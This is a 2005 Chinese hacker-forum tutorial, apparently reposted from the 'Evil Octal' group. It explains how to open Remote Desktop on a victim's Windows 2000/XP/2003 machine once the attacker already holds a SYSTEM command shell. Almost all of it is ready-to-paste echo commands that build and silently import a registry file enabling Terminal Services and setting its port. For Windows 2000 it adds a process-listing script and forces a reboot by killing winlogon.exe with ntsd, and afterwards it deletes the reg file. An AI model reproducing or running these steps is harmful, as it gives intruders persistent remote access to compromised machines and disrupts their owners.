開啟終端的最簡單方法全攻略
作者:tank 日期:2005-01-23
開啟終端的最簡單方法全攻略
作者:haicao [E.S.T]
信息來源:邪惡八進制
今天介紹的這種開終端的方法,綠色,環保,無污染~~
不須上傳任何檔開啟終端的方法適合win2k,xp,2003.
本文前提是已經通過某種方法得到了對方的一個SYSTEM權限的CMDSHELL~~
在無須傳任何文件的情況下開啟終端服務。
一、win 2k下終端開啟終端
首先用ECHO寫一個3389.reg文件,然後導入到註冊表,echo代碼如下:
echo Windows Registry Editor Version 5.00 >>3389.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
echo "Enabled"="0" >>3389.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>3389.reg
echo "ShutdownWithoutLogon"="0" >>3389.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>3389.reg
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>3389.reg
echo "TSEnabled"=dword:00000001 >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
echo "Start"=dword:00000002 >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>3389.reg
echo "Start"=dword:00000002 >>3389.reg
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
echo "Hotkey"="1" >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>3389.reg
echo "PortNumber"=dword:00000D3D >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>3389.reg
echo "PortNumber"=dword:00000D3D >>3389.reg
把這些ECHO代碼到CMDSHELL下貼粘就可以生成3389.reg文件,接著regedit /s 3389.reg導入註冊表。
(如果要改變終端端口只須把上面的兩個D3D都改一下就可以了)
因為win 2k下開終端不能像XP一樣可以立即生效,而是需重啟機器後才生效。
一個簡單的辦法就是用ntsd.exe(win2k以上自帶的命令)結束一個重要的進程就可以實現機器重啟了!!
比如結束winlogon.exe,lsass.exe也可以但結束後會跳出重啟倒計時(不太好~)
winlogon.exe被關閉後機器立刻強制重啟了
命令執行格式為ntsd -c q -p PID
那如何知道winlogon.exe的PID進程號呢~
以下這個腳本可以列舉當前所有進程的PID:
for each ps in getobject("winmgmts:\\.\root\cimv2:win32_process").instances_
wscript.echo ps.handle&vbtab&ps.name
next
echo for each ps in getobject("winmgmts:\\.\root\cimv2:win32_process").instances_ >>1.vbe
echo wscript.echo ps.handle^&vbtab^&ps.name>>1.vbe
echo next>>1.vbe
生成1.vbe後請檢查一下echo出來的腳本是否有錯(才四行,對一下上面給出的就可以了)。
運行1.vbe得到如下運行結果:
C:\WINNT\system32>cscript 1.vbe
cscript 1.vbe
Microsoft (R) Windows 腳本宿主版本 5.1 for Windows
版權所有(C) Microsoft Corporation 1996-1999. All rights reserved.
PID ProcessName
0 System Idle Process
8 System
152 smss.exe
180 csrss.exe
200 winlogon.exe
228 services.exe
240 lsass.exe
424 svchost.exe
472 spoolsv.exe
512 msdtc.exe
616 svchost.exe
628 KAVSvc.EXE
660 llssrv.exe
692 nvsvc32.exe
728 regsvc.exe
748 MSTask.exe
776 alter.exe
900 svchost.exe
916 WinMgmt.exe
1088 Dfssvc.exe
484 Explorer.EXE
1444 mdm.exe
1340 Server.exe
1224 ibguard.exe
1252 KAVSvcUI.EXE
1256 ibserver.exe
1336 internat.exe
1204 Uspds.exe
720 bar.exe
1288 dllhost.exe
1580 inetinfo.exe
1672 cmd.exe
1464 pppoe.exe
1704 regedit.exe
316 cscript.exe
從上面可以看出當前winlogon.exe的PID號為200運行命令ntsd -c q -p 200 (這裡的200要替換為winlogon.exe進程對就的PID啦)過會兒機器馬
上重啟了(ntsd.exe是WIN自帶的可用來結束任意級別進程)等著收穫吧~~
二、winxp和win2003終端開啟
開啟的REG文件代碼如下:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"fDenyTSConnections"=dword:00000000
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]
"PortNumber"=dword:00000D3D
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]
"PortNumber"=dword:00000D3D
用以下ECHO代碼寫一個REG文件:
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>>3389.reg
echo "fDenyTSConnections"=dword:00000000>>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]>>3389.reg
echo "PortNumber"=dword:00000d3d>>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]>>3389.reg
echo "PortNumber"=dword:00000d3d>>3389.reg
regedit /s 3389.reg
del 3389.reg
這樣xp和2003開啟終端是不用重啟的如果你想改端口只需把上面的兩個PortNumber對應的D3D改成相應十進制數的十六進制形式就可以了!用計算器轉換吧。
XP下不論開終端還是改終端端口都不需重啟,真是太妙了~~呵呵。
如果要關閉終閉只需把"fDenyTSConnections"=dword:00000000
改成"fDenyTSConnections"=dword:00000001